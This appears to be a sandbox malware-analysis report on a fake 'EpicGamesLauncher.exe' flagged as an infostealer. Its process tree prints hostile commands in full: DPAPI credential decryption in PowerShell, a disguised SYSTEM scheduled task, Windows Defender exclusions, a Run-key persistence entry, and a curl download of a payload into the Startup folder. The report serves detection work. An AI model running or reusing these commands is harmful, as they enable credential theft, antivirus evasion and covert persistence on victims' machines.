Overview

overview

7

Static

static

3

External 4.2.5.exe

windows10-2004-x64

7

External 4.2.5.exe

windows11-21h2-x64

7

$PLUGINSDI...ls.dll

windows10-2004-x64

3

$PLUGINSDI...ls.dll

windows11-21h2-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

$PLUGINSDI...em.dll

windows11-21h2-x64

3

EpicGamesLauncher.exe

windows10-2004-x64

7

EpicGamesLauncher.exe

windows11-21h2-x64

7

LICENSES.c...m.html

windows10-2004-x64

1

LICENSES.c...m.html

windows11-21h2-x64

1

d3dcompiler_47.dll

windows10-2004-x64

1

d3dcompiler_47.dll

windows11-21h2-x64

1

ffmpeg.dll

windows10-2004-x64

1

ffmpeg.dll

windows11-21h2-x64

1

libEGL.dll

windows10-2004-x64

1

libEGL.dll

windows11-21h2-x64

1

libGLESv2.dll

windows10-2004-x64

1

libGLESv2.dll

windows11-21h2-x64

1

locales/uk.ps1

windows10-2004-x64

1

locales/uk.ps1

windows11-21h2-x64

1

resources/elevate.exe

windows10-2004-x64

1

resources/elevate.exe

windows11-21h2-x64

1

vk_swiftshader.dll

windows10-2004-x64

1

vk_swiftshader.dll

windows11-21h2-x64

1

vulkan-1.dll

windows10-2004-x64

1

vulkan-1.dll

windows11-21h2-x64

1

$PLUGINSDI...7z.dll

windows10-2004-x64

3

$PLUGINSDI...7z.dll

windows11-21h2-x64

3

Analysis

  • max time kernel
    83s
  • max time network
    94s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-01-2024 18:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EpicGamesLauncher.exe

  • Size

    154.9MB

  • MD5

    928282456673e0a194360f9d411f165d

  • SHA1

    9820bd055f95d157fdbdc973bfc955c282a18c29

  • SHA256

    5088d3e4c0b15af2cdd00ab98ca1cdd273cce489b7ac610d4ddda1f1f8154b82

  • SHA512

    c71623dd5396c89bf3d163451cb0c47d26181d4e4136c041cc888c78ef770d944a64c505efdbbe94bd09456c5b072845f98d3e5b3bcf68075cacb6bd1dfc1753

  • SSDEEP

    1572864:HCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:nDAgZi

Score
7/10
persistencespywarestealer

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3108
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f
        3⤵
          PID:228
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,88,188,177,69,159,244,78,49,36,37,13,16,61,123,22,52,165,96,31,7,181,89,43,97,239,36,133,195,145,206,249,188,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,14,130,143,153,232,28,222,36,176,93,152,240,69,4,63,103,84,145,4,102,184,141,229,30,45,70,3,80,13,126,80,12,48,0,0,0,70,137,73,114,174,219,82,237,21,36,128,227,226,7,134,121,119,196,34,201,27,42,93,236,183,227,66,86,75,3,104,162,39,131,33,156,77,217,56,74,123,142,84,10,75,134,81,67,64,0,0,0,156,56,137,211,20,196,4,162,160,166,211,177,139,126,179,0,170,247,246,148,134,51,204,252,148,198,27,173,71,151,67,110,166,204,25,196,120,245,124,176,239,114,79,250,87,107,188,230,15,207,32,113,43,208,131,176,125,148,212,15,30,43,50,197), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,88,188,177,69,159,244,78,49,36,37,13,16,61,123,22,52,165,96,31,7,181,89,43,97,239,36,133,195,145,206,249,188,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,14,130,143,153,232,28,222,36,176,93,152,240,69,4,63,103,84,145,4,102,184,141,229,30,45,70,3,80,13,126,80,12,48,0,0,0,70,137,73,114,174,219,82,237,21,36,128,227,226,7,134,121,119,196,34,201,27,42,93,236,183,227,66,86,75,3,104,162,39,131,33,156,77,217,56,74,123,142,84,10,75,134,81,67,64,0,0,0,156,56,137,211,20,196,4,162,160,166,211,177,139,126,179,0,170,247,246,148,134,51,204,252,148,198,27,173,71,151,67,110,166,204,25,196,120,245,124,176,239,114,79,250,87,107,188,230,15,207,32,113,43,208,131,176,125,148,212,15,30,43,50,197), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3804
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,119,163,34,135,74,178,240,63,43,79,97,213,13,102,156,78,224,181,168,240,220,225,231,81,235,70,207,14,15,104,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,68,41,98,143,158,44,10,97,42,30,44,16,217,134,38,236,84,10,79,183,7,190,236,177,37,253,51,251,102,40,175,217,48,0,0,0,16,165,141,168,118,147,167,55,129,96,100,114,246,179,204,6,177,210,76,67,170,222,51,164,234,178,213,45,139,67,203,82,53,29,38,117,206,164,134,113,161,147,166,226,108,213,16,158,64,0,0,0,43,48,98,185,134,17,42,150,116,221,19,191,151,165,100,202,106,216,108,5,233,16,200,251,247,160,197,227,156,199,158,239,217,231,101,26,185,39,233,93,105,249,132,105,61,145,35,16,247,20,165,108,197,18,83,76,232,242,237,53,164,12,73,85), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2184
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,119,163,34,135,74,178,240,63,43,79,97,213,13,102,156,78,224,181,168,240,220,225,231,81,235,70,207,14,15,104,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,68,41,98,143,158,44,10,97,42,30,44,16,217,134,38,236,84,10,79,183,7,190,236,177,37,253,51,251,102,40,175,217,48,0,0,0,16,165,141,168,118,147,167,55,129,96,100,114,246,179,204,6,177,210,76,67,170,222,51,164,234,178,213,45,139,67,203,82,53,29,38,117,206,164,134,113,161,147,166,226,108,213,16,158,64,0,0,0,43,48,98,185,134,17,42,150,116,221,19,191,151,165,100,202,106,216,108,5,233,16,200,251,247,160,197,227,156,199,158,239,217,231,101,26,185,39,233,93,105,249,132,105,61,145,35,16,247,20,165,108,197,18,83,76,232,242,237,53,164,12,73,85), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2188
      • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
        "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1896,i,10055106198983210111,3317251793597964183,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        2⤵
          PID:4812
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1216
        • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
          "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --mojo-platform-channel-handle=1208 --field-trial-handle=1896,i,10055106198983210111,3317251793597964183,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
          2⤵
            PID:4412
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs""
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4544
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
          1⤵
          • Creates scheduled task(s)
          PID:4712
        • C:\Windows\system32\cscript.exe
          cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat" "
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4748
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2944
            • C:\Windows\system32\reg.exe
              reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher"
              3⤵
              • Modifies registry key
              PID:4296
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe""
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4432
            • C:\Windows\system32\curl.exe
              curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe" YOUR-DIRECT-DOWNLOAD-HERE
              3⤵
                PID:4196
          • C:\Windows\system32\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" /f
            1⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2788

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            f69f145ee494b2d67c5d50108c862d4a

            SHA1

            68f36b9bd553beb2a7eec5f4a8fef317703c77e1

            SHA256

            06dd71fdfda7e319131bf98bd21dc6bee9a480736ab688e52bafe10074f00fc7

            SHA512

            302489f1e2676d83cf9cf92d378176a230f15975af12e2a2a50d9c057f4de0fc2c22f68a9390f5b337eaa10ea77366a1a79e71808de1e7a7c4e6432aeb75c530

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e7339e4d017234926c6384e8ef20b163

            SHA1

            0c3c4db486c5b8dc0eea6a93d0839af22b1aef85

            SHA256

            eed9464de2ab5c9f58f0e4788f26f77c690ce39984bc95627ac55ba530f71a3b

            SHA512

            a2c5fc13d6fe7d602ae461f732495db08b802d35ce54c9a5233f2600efc5ac5f6276fedf8bcc02dad3a266354965836186950def9a7716d71729bb9fdcfdda6e

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            893b9532155131e022a692e47a25aa6f

            SHA1

            3a4b59a134ad232cde089477dcda0761c602f4be

            SHA256

            28a66af519cd7ef3c5a2c3acf62cd87c2d01e8de0e30ca57a43e121bdab58c3e

            SHA512

            fd28859ef52459c4a72d557da9005de37140cf47f8b0c02949e33d9f3d2c2bd00ee529310df398bb75e18f1f07fed69d9af6f97493d5c1b58961fb1ac82967f6

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            1e55f772985b854903378076f66a210c

            SHA1

            b330fe58e792634956caa9c22fbbf274cab126fc

            SHA256

            1dc72835cfe740b65cf96c0a6d5c9f46198a69f19462d1c122d137337ffa3ee5

            SHA512

            9c9f9407bc12ff9236df56eeeb6dc691e9aec42bc4d398ff86c68c7025434b0975d22276b06c3be270f2049877114e2b322b8daddefed53de94ec75be0c2f3e3

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulvghexd.4gn.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\c5d4200e-7b09-4d58-b8b1-8c7465524f44.tmp.node
            Filesize

            1.8MB

            MD5

            3072b68e3c226aff39e6782d025f25a8

            SHA1

            cf559196d74fa490ac8ce192db222c9f5c5a006a

            SHA256

            7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

            SHA512

            61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

            Download Submit

          • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat
            Filesize

            1KB

            MD5

            c18c10cb23ca6e5490be6eb2fb1a1ddc

            SHA1

            4a3082ddd4851da7db0b8527c31b2ba23877c011

            SHA256

            a58332b95f300a9b5d1309bfc18e5b97b59c1b94145064aeedaf6e9718022b9d

            SHA512

            537462aebe04acd652f310c684b2b562d72665f2b379b830ff15f069603f3ff0229ea65504f0e53f3cb983eeae1de01c4c0518281fe31cef5a890eecc4e2b1bb

            Download Submit

          • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs
            Filesize

            167B

            MD5

            323e6511a0f7e82c511ea954d1530b13

            SHA1

            8b167e573b0663d1bc5a60f0d7b3f267f0bc1a20

            SHA256

            48a92c93fb07c8f059e0622ce2a95e32726d02fcb23f7bfb384374e636518597

            SHA512

            757163f84f9352bef973c6a7a994dc4a8492d224820ca5c86e572ed67b3bbe6049444d2a07b08c9efd4bb59b9e5e52ba3fdd397f01f55ddfcf3a5ae3d07ebf6a

            Download Submit

          • memory/2188-40-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2188-36-0x000001A499B50000-0x000001A499B60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2188-34-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2188-35-0x000001A499B50000-0x000001A499B60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2188-37-0x000001A499B50000-0x000001A499B60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2944-66-0x0000020F7D850000-0x0000020F7D860000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2944-65-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2944-70-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2944-67-0x0000020F7D850000-0x0000020F7D860000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2944-68-0x0000020F7D850000-0x0000020F7D860000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3804-16-0x0000021ACD2F0000-0x0000021ACD300000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3804-22-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3804-17-0x0000021ACD2F0000-0x0000021ACD300000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3804-15-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3804-18-0x0000021ACD730000-0x0000021ACD780000-memory.dmp

            Filesize

            320KB

            Download

          • memory/3804-11-0x0000021ACD300000-0x0000021ACD322000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4432-81-0x0000022C24700000-0x0000022C24710000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4432-80-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4432-82-0x0000022C24700000-0x0000022C24710000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4432-84-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB

            Download